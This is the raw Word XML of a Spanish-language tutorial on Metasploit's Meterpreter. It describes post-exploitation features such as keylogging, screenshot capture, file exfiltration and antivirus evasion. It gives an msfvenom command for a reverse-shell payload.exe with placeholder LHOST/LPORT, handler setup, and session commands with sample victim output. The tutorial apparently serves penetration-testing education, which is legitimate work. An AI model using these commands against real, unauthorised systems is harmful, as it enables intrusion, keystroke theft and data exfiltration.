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10" w:rsidRPr="00EE6010" w:rsidRDefault="00EE6010" w:rsidP="00EE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avanzado desarrollado como parte del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Framework. Proporciona una interfaz potente y flexible para interactuar con el sistema de la víctima después de que se ha comprometido. Aquí tienes una descripción más detallada:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6010" w:rsidRPr="00EE6010" w:rsidRDefault="00EE6010" w:rsidP="00EE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Características de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Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00EE6010" w:rsidRPr="00EE6010" w:rsidRDefault="00EE6010" w:rsidP="00EE6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Interfaz de Línea de Comandos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proporciona una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shell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interactiva en la máquina comprometida, permitiendo a los atacantes ejecutar comandos de manera similar a una línea de comandos estándar de Linux o Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6010" w:rsidRPr="00EE6010" w:rsidRDefault="00EE6010" w:rsidP="00EE6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Módulos de Carga Dinámica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cargar módulos adicionales en la memoria de la máquina comprometida sin tocar el disco, lo que reduce las probabilidades de ser detectado por software antivirus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6010" w:rsidRPr="00EE6010" w:rsidRDefault="00EE6010" w:rsidP="00EE6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Transporte Seguro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 conexiones cifradas para comunicar información entre el atacante y el sistema comprometido, lo que ayuda a evitar la detección por mecanismos de seguridad de red.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6010" w:rsidRPr="00EE6010" w:rsidRDefault="00EE6010" w:rsidP="00EE6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Funciones Avanzadas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de Pantalla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Capturar imágenes de la pantalla de la víctima.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Keylogging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Registrar las pulsaciones del teclado.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Exfiltración</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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Archivos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Descargar y subir archivos desde y hacia la máquina comprometida.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Control de Procesos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Listar, matar y migrar procesos.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Networking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Crear túneles de red y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redireccionar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tráfico.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6010" w:rsidRPr="00EE6010" w:rsidRDefault="00EE6010" w:rsidP="00EE6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Post-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Exploitation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Ejecución de scripts y módulos para mantener el acceso, escalar privilegios, y más.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6010" w:rsidRPr="00EE6010" w:rsidRDefault="00EE6010" w:rsidP="00EE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Uso Básico de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Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00EE6010" w:rsidRPr="00EE6010" w:rsidRDefault="00EE6010" w:rsidP="00EE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Generar un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Puedes usar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msfvenom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generar un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msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-p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LHOST=&lt;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tu_IP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&gt; LPORT=&lt;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tu_puerto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&gt; -f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exe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payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6010" w:rsidRPr="00EE6010" w:rsidRDefault="00EE6010" w:rsidP="00EE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Configurar el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Handler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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configura el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listener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el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  <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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payload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LHOST &lt;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tu_IP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LPORT &lt;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tu_puerto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exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00EE6010" w:rsidRPr="00EE6010" w:rsidRDefault="00EE6010" w:rsidP="00EE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Ejecutar el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la Máquina Víctima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Cuando la víctima ejecute el archivo </w:t>
      </w:r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payload.exe</w:t>
      </w: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se establecerá una conexión con el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listener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obtendrás una sesión de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EE6010" w:rsidRPr="00EE6010" w:rsidRDefault="00EE6010" w:rsidP="00EE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Comandos de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sysinfo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información del sistema de la víctima.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getuid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el usuario bajo el cual se está ejecutando la sesión.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upload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w: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download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Subir y descargar archivos.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screenshot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Capturar una imagen de la pantalla de la víctima.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keyscan_start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE601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</w:t>
      </w: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keyscan_dump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Iniciar un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keylogger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mostrar las pulsaciones capturadas.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ps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Listar procesos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6010" w:rsidRPr="00EE6010" w:rsidRDefault="00EE6010" w:rsidP="00EE6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migrate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: Migrar la sesión a otro proceso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6010" w:rsidRPr="00EE6010" w:rsidRDefault="00EE6010" w:rsidP="00EE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E601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Uso</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6010" w:rsidRPr="00EE6010" w:rsidRDefault="00EE6010" w:rsidP="00EE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Imaginemos que has generado y ejecutado un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exitosamente y tienes una sesión de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. Puedes empezar ejecutando comandos como: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plaintext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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sysinfo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Computer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: VICTIM-PC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OS              : Windows 7 (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Build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7601,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Service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Pack 1).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Architecture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: x64</w:t>
      </w:r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System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Language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:</w:t>
      </w:r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en_US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: x86/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plaintext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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proofErr w:type="gram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screenshot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00EE6010" w:rsidRPr="00EE6010" w:rsidRDefault="00EE6010" w:rsidP="00EE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Screenshot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saved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EE6010">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>: /root/.msf4/loot/20230707123456_default_192.168.1.10_host.screenshot_987654.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6010" w:rsidRPr="00EE6010" w:rsidRDefault="00EE6010" w:rsidP="00EE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y versátil dentro del arsenal de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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EE601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realizar actividades post-explotación. Utiliza estas capacidades de manera responsable y siempre con autorización explícita.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2342" w:rsidRDefault="00EE601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A0211"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC4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77435"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AFD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DF"/>
    <w:rsid w:val="00075EE0"/>
    <w:rsid w:val="005245DF"/>
    <w:rsid w:val="00E001F3"/>
    <w:rsid w:val="00E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01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E6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E601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01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010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EE6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01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E6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E601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01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010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EE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2626</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>21</Lines>
  <Paragraphs>6</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Luffi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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-12T07:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-12T07:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>